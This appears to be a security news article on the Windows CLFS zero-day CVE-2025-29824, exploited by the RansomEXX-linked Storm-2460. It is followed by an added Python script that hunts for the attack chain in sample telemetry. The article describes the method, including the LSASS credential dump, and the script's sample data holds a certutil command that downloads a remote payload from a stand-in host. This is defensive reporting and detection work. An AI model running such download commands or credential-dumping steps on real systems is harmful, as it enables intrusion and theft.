Windows CLFS vulnerability could lead to 'widespread deployment and detonation of ransomware'

Microsoft has disclosed a zero-day vulnerability in the Windows Common Log File System (CLFS) driver that is being exploited in the wild to deploy ransomware. Targeted industries include IT, real estate, finance, software and retail, with organizations based in the United States, Spain, Venezuela and Saudi Arabia.

The vulnerability, tracked as CVE-2025-29824 and rated "Important", lies in the CLFS kernel driver. It allows an attacker who already has standard user access to a system to elevate their local privileges. The attacker can then use that privileged access for "widespread deployment and detonation of ransomware within an environment", according to a blog post from the Microsoft Threat Intelligence Center.

The CLFS driver is a core Windows component used to write transaction logs, and its abuse can let an attacker obtain SYSTEM privileges. From there, they could steal data or install backdoors. Microsoft regularly finds privilege escalation flaws in CLFS; the most recent one was patched in December.

In the CVE-2025-29824 exploitation observed by Microsoft, the so-called PipeMagic malware was deployed before the attackers exploited the vulnerability to elevate their privileges. PipeMagic gives attackers remote control of a system and lets them run commands or install further malicious tools.


Who is behind the exploitation?

Microsoft has identified Storm-2460 as the threat actor exploiting this vulnerability with PipeMagic and ransomware, and links it to the RansomEXX group.

Once known as Defray777, the attackers emerged in 2018. Since then they have hit high-profile organizations such as the Texas Department of Transportation, the Brazilian government and the Taiwanese hardware manufacturer Gigabyte. The group has been linked to Russian nationals.

The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability, which carries a CVSS score of 7.8, to its Known Exploited Vulnerabilities catalog, which means federal civilian agencies must apply the patch by April 29.

Windows 10, Windows 11 and Windows Server are vulnerable

On April 8, security updates were released to patch the vulnerability in Windows 11, Windows Server 2022 and Windows Server 2019. Windows 10 x64 and 32-bit systems are still awaiting fixes, but Redmond says they will be released "as soon as possible" and that "customers will be notified via a revision to this CVE information" once they are available.

Devices running Windows 11 version 24H2 or newer cannot be exploited in this way, even though the vulnerability is present: access to the system information the exploit needs is restricted to users holding SeDebugPrivilege, an access level that standard users do not normally have.

How exploitation works

Microsoft observed the threat actors using the certutil command-line utility to download a malicious MSBuild file onto the victim's system.

This file, which carried an encrypted PipeMagic payload, was hosted on a legitimate third-party website that had been compromised to stage the threat actor's malware. One domain PipeMagic communicated with was aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which has since been taken down.

Once PipeMagic was decrypted and executed in memory, the attackers ran the exploit from a dllhost.exe process, which leaked kernel addresses (memory locations) to user mode. The exploit then overwrote the process token, which defines what the process is allowed to do, with the value 0xFFFFFFFF, granting full privileges and allowing the attackers to inject code into SYSTEM-level processes.

They then injected a payload into the system's winlogon.exe process, which in turn injected the Sysinternals procdump.exe tool into another dllhost.exe process and ran it. This allowed the threat actor to dump the memory of LSASS, the process that holds user credentials.

After the credential theft, the ransomware was deployed. Microsoft observed encrypted files with a random extension appended, and a ransom note named !_READ_ME_REXX2_!.txt dropped on affected systems.
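The chain above gives a defender four observable stages: certutil fetching a remote file, an unusual dllhost.exe, a read of LSASS memory from that dllhost.exe, and the ransom note landing on disk. The following Python is an added example (not code from the article or from Microsoft) that hunts for those stages over constructed process-creation, process-access and file-creation records in a simplified Sysmon-like shape, then correlates them per host. The record layout, the sample telemetry, the small allow list of processes expected to read LSASS, and the "dllhost.exe without /Processid:" heuristic are assumptions to tune for a real environment.

```python
"""Hunt for the observable stages of the Storm-2460 / CVE-2025-29824 chain.

Added example, not code from the article or from Microsoft. The event
layout (one dict per record, Sysmon-like but simplified), the allow list
of LSASS readers and the dllhost.exe "/Processid:" heuristic are
assumptions; the sample events at the bottom are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Ransom note name reported in the article.
RANSOM_NOTE_RE = re.compile(r"^!_read_me_rexx2_!\.txt$", re.IGNORECASE)
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
# Assumption: processes that legitimately read LSASS memory on this estate (tune it).
LSASS_READERS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}


def _basename(path: str) -> str:
    """Lower-case file name from a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_certutil_download(ev):
    """Stage 1: certutil.exe fetching a remote file (the malicious MSBuild file)."""
    if ev["event"] == "ProcessCreate" and _basename(ev["image"]) == "certutil.exe":
        m = URL_RE.search(ev["cmdline"])
        if m:
            return Finding("certutil_remote_download", ev["host"], m.group(0))
    return None


def rule_dllhost_without_processid(ev):
    """Stage 2: the exploit ran inside dllhost.exe. Legitimate COM surrogate
    launches carry a /Processid:{GUID} argument; flagging a bare dllhost.exe
    is a hunting heuristic (assumption), not something the article states."""
    if ev["event"] == "ProcessCreate" and _basename(ev["image"]) == "dllhost.exe":
        if "/processid:" not in ev["cmdline"].lower():
            return Finding("dllhost_without_processid", ev["host"], ev["cmdline"])
    return None


def rule_lsass_memory_read(ev):
    """Stage 3: procdump injected into dllhost.exe dumping LSASS shows up as a
    process-access event from dllhost.exe to lsass.exe with VM_READ granted."""
    if ev["event"] == "ProcessAccess" and _basename(ev["target_image"]) == "lsass.exe":
        src = _basename(ev["source_image"])
        if src not in LSASS_READERS_ALLOWED and ev["granted_access"] & PROCESS_VM_READ:
            return Finding("suspicious_lsass_read", ev["host"],
                           f"{src} mask=0x{ev['granted_access']:x}")
    return None


def rule_ransom_note(ev):
    """Stage 4: the RansomEXX note named in the article written to disk."""
    if ev["event"] == "FileCreate" and RANSOM_NOTE_RE.match(_basename(ev["target_path"])):
        return Finding("ransomexx_note_dropped", ev["host"], ev["target_path"])
    return None


RULES = (rule_certutil_download, rule_dllhost_without_processid,
         rule_lsass_memory_read, rule_ransom_note)


def hunt(events):
    """Run every rule over every event; return findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                findings.append(hit)
    return findings


def hosts_with_full_chain(findings):
    """Hosts on which all four stages were seen; these go to incident response first."""
    seen = {}
    for f in findings:
        seen.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in seen.items() if len(rules) == len(RULES))


# Constructed sample telemetry: a clean host (WS01) and a host showing the chain (WS02).
# The GUID below is arbitrary.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "host": "WS01", "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": "dllhost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"},
    {"event": "ProcessAccess", "host": "WS01", "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1000},
    {"event": "ProcessCreate", "host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f https://compromised.example/u.msbuild C:\Users\Public\u.proj"},
    {"event": "ProcessCreate", "host": "WS02", "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": "dllhost.exe"},
    {"event": "ProcessAccess", "host": "WS02", "source_image": r"C:\Windows\System32\dllhost.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1FFFFF},
    {"event": "FileCreate", "host": "WS02",
     "target_path": r"C:\Users\alice\Documents\!_READ_ME_REXX2_!.txt"},
]

if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host}: {f.rule} ({f.detail})")
    print("full chain on:", hosts_with_full_chain(hits))
```

Each rule on its own is noisy in a large estate (certutil and dllhost.exe are legitimate tools), which is why the correlation in hosts_with_full_chain matters more than any single hit; the LSASS rule is the strongest individual signal and is worth alerting on by itself once the allow list is tuned.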
